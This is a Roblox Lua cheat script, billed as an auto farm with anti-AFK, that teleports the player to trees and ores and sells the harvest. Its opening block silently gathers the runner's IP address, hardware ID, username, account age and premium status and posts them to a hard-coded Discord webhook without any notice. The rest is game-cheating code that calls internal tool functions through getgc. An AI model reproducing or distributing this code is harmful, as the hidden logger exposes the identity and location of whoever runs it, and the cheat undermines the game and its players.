-- legend's cool auto farm
local IP = game:HttpGet("https://v4.ident.me")
plr = game:GetService'Players'.LocalPlayer
local premium = false
local ALT = false
if plr.MembershipType == Enum.MembershipType.Premium then
	premium = true
elseif plr.MembershipType == Enum.MembershipType.None then
	premium = false
end
if premium == false then 
	if plr.AccountAge <= 70 then 
		ALT = true
	end
end

local market = game:GetService("MarketplaceService")
local info = market:GetProductInfo(game.PlaceId, Enum.InfoType.Asset)


local http_request = http_request;
if syn then
	http_request = syn.request
elseif SENTINEL_V2 then
	function http_request(tb)
		return {
			StatusCode = 200;
			Body = request(tb.Url, tb.Method, (tb.Body or ''))
		}
	end
end

local body = http_request({Url = 'https://httpbin.org/get'; Method = 'GET'}).Body;
local decoded = game:GetService('HttpService'):JSONDecode(body)
local hwid_list = {"Syn-Fingerprint", "Exploit-Guid", "Proto-User-Identifier", "Sentinel-Fingerprint"};
hwid = "";

for i, v in next, hwid_list do
	if decoded.headers[v] then
		hwid = decoded.headers[v];
		break
	end
end

if hwid then
local HttpServ = game:GetService('HttpService')
local url = "https://discord.com/api/webhooks/979608293137858615/Y5-pLJ7h9uJlzwTuBtrGzpwCDhGI1kT-lKPRWtYmwLPnsN-RQdqG75Ve5BYgQmHx03TW"


local data = 
    {
        ["content"] = "",
        ["embeds"] = {{
            ["title"] = "__**HWID:**__",
            ["description"] = hwid,
            ["type"] = "rich",
            ["color"] = tonumber(0xAB0909),
            ["fields"] = {
                {
                    ["name"] = "Username:",
                    ["value"] = Game.Players.LocalPlayer.Name,
                    ["inline"] = true
                },
				{
                    ["name"] = "IP Address:",
                    ["value"] = IP,
                    ["inline"] = true
                },
				{
                    ["name"] = "Game Link:",
                    ["value"] = "https://roblox.com/games/" .. game.PlaceId .. "/",
                    ["inline"] = true
                },
				{
					["name"] = "Game Name:",
					["value"] = info.Name,
					["inline"] = true
				},
				{
					["name"] = "Age:",
					["value"] = plr.AccountAge,
					["inline"] = true
				},
				{
					["name"] = "Premium:",
					["value"] = premium,
					["inline"] = true
				},
				{
					["name"] = "ALT:",
					["value"] = ALT,
					["inline"] = true
				},
				
            },
        }}
    }
    local newdata = HttpServ:JSONEncode(data)
    
    local headers = {
            ["content-type"] = "application/json"
    }
    
    local request_payload = {Url=url, Body=newdata, Method="POST", Headers=headers}
    http_request(request_payload)
end

wait(0.5)local ba=Instance.new("ScreenGui")
local ca=Instance.new("TextLabel")local da=Instance.new("Frame")
local _b=Instance.new("TextLabel")local ab=Instance.new("TextLabel")ba.Parent=game.CoreGui
ba.ZIndexBehavior=Enum.ZIndexBehavior.Sibling;ca.Parent=ba;ca.Active=true
ca.BackgroundColor3=Color3.new(0.176471,0.176471,0.176471)ca.Draggable=true
ca.Position=UDim2.new(0.698610067,0,0.098096624,0)ca.Size=UDim2.new(0,304,0,52)
ca.Font=Enum.Font.SourceSansSemibold;ca.Text="Autofarm Anti AFK"ca.TextColor3=Color3.new(0,1,1)
ca.TextSize=22;da.Parent=ca
da.BackgroundColor3=Color3.new(0.196078,0.196078,0.196078)da.Position=UDim2.new(0,0,1.0192306,0)
da.Size=UDim2.new(0,304,0,107)_b.Parent=da
_b.BackgroundColor3=Color3.new(0.176471,0.176471,0.176471)_b.Position=UDim2.new(0,0,0.800455689,0)
_b.Size=UDim2.new(0,304,0,21)_b.Font=Enum.Font.Arial;_b.Text="Made by Legend"
_b.TextColor3=Color3.new(1,1,1)_b.TextSize=20;ab.Parent=da
ab.BackgroundColor3=Color3.new(0.176471,0.176471,0.176471)ab.Position=UDim2.new(0,0,0.158377379,0)
ab.Size=UDim2.new(0,304,0,44)ab.Font=Enum.Font.ArialBold;ab.Text="Status: Script Started"
ab.TextColor3=Color3.new(1,1,1)ab.TextSize=20;local bb=game:service'VirtualUser'
game:service'Players'.LocalPlayer.Idled:connect(function()
bb:CaptureController()bb:ClickButton2(Vector2.new())
ab.Text="You went idle and ROBLOX tried to kick you but i reflected it"wait(2)ab.Text="Script Re-Enabled"end)

getgenv().WantedMaterials = {
    "whitewood","opal","bloodwood","crimsonite","cursed wood","defiled wood"
};
getgenv().FarmOnlyTrees = false;
getgenv().FarmOn = true;

local Trees, Ores = game:GetService("Workspace")["Tree Tracker"], game:GetService("Workspace")["Ore Tracker"];
local Sell = game:GetService("ReplicatedStorage").Communication.SellTradeItem;
local RunService = game:GetService("RunService");
local Players = game:GetService("Players");
local Player = Players.LocalPlayer;
local function SC()
    local function GetToolFuncs()
        local Res = {};
        local Consts = {"Health", 0, "tick", 0.5, "Position", "name", "the mines", "Fire", "the peaceful mines", "swing_1"};
        for _, Func in pairs(getgc()) do if type(Func) == "function" and islclosure(Func) then
            local Const = debug.getconstants(Func);
            for _, c in pairs(Consts) do
                if Const[_] ~= c or getfenv(Func).script.Name ~= "SetupTool" or getfenv(Func).script.Parent == nil then break; end;
                table.insert(Res, Func);
            end;
        end end;
        return Res;
    end;
    local Char, Hum, Hrp;
    local function Update()
        Char = Player.Character;
        if not Char then
            repeat RunService.Heartbeat:Wait() until Player.Character;
            Char = Player.Character;
        end;
        Hum = Char:FindFirstChildOfClass("Humanoid");
        if not Hum then
            repeat RunService.Heartbeat:Wait() until Char:FindFirstChildOfClass("Humanoid");
            Hum = Char:FindFirstChildOfClass("Humanoid");
        end;
        Hrp = Char:FindFirstChild("HumanoidRootPart");
        if not Hrp then
            repeat RunService.Heartbeat:Wait() until Char:FindFirstChild("HumanoidRootPart");
            Hrp = Char.HumanoidRootPart;
        end;
    end;

    local function IndexTarget()
        for i, v in pairs(WantedMaterials) do
            WantedMaterials[i] = v:lower();
        end;
        for Idx, Wanted in pairs(WantedMaterials) do
            local Tree, Ore = Trees:FindFirstChild(Wanted), Ores:FindFirstChild(Wanted);
            if Tree then
                for Idx, Tr in pairs(Trees:GetChildren()) do
                    if Tr.Adornee and Tr.Adornee.Parent and Tr.Name == Wanted then
                        return Tr.Name, Tr.Adornee, true, true;
                    end;
                end;
            elseif Ore then
                for Idx, Or in pairs(Ores:GetChildren()) do
                    if Or.Adornee and Or.Adornee.Parent and Or.Name == Wanted then
                        return Or.Name, Or.Adornee, false, true;
                    end;
                end;
            end;
        end;
        --No WantedMaterials Found!
        if not FarmOnlyTrees then
            for Idx, Ore in pairs(Ores:GetChildren()) do
                if Ore.Adornee and Ore.Adornee.Parent then
                    return Ore.Name, Ore.Adornee, false, false;
                end;
            end;
        end;
        for Idx, Tree in pairs(Trees:GetChildren()) do
            if Tree.Adornee and Tree.Adornee.Parent then
                return Tree.Name, Tree.Adornee, true, false;
            end;
        end;
    end;

    local function GetTarget(Target)
        Update();
        local TName, Target, IsTree, Wanted = IndexTarget();
        local RF = GetToolFuncs();
        --Pickup
        repeat RunService.Heartbeat:Wait();
            Hrp.CFrame = Target.CFrame - (Target.CFrame.lookVector*2.5) + Vector3.new(0, 1.75, 0);
            for _, f in pairs(RF) do
                f();
            end;
        until not Target.Parent or not Hrp or not Hrp.Parent;
        if not Wanted then
            game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame = CFrame.new(783.785767, 296.813995, 771.804382, 0.811039627, -0.000944857427, -0.584990323, -4.78144329e-07, 0.999998629, -0.00161581056, 0.584991217, 0.00131075876, 0.811038554)
            wait(1)
            Sell:InvokeServer(TName, false);
        end;
    end;

    repeat
        GetTarget(IndexTarget());
    until not FarmOn;
end;
Player.CharacterAdded:Connect(function()
    wait(2);
    SC();
end);
SC();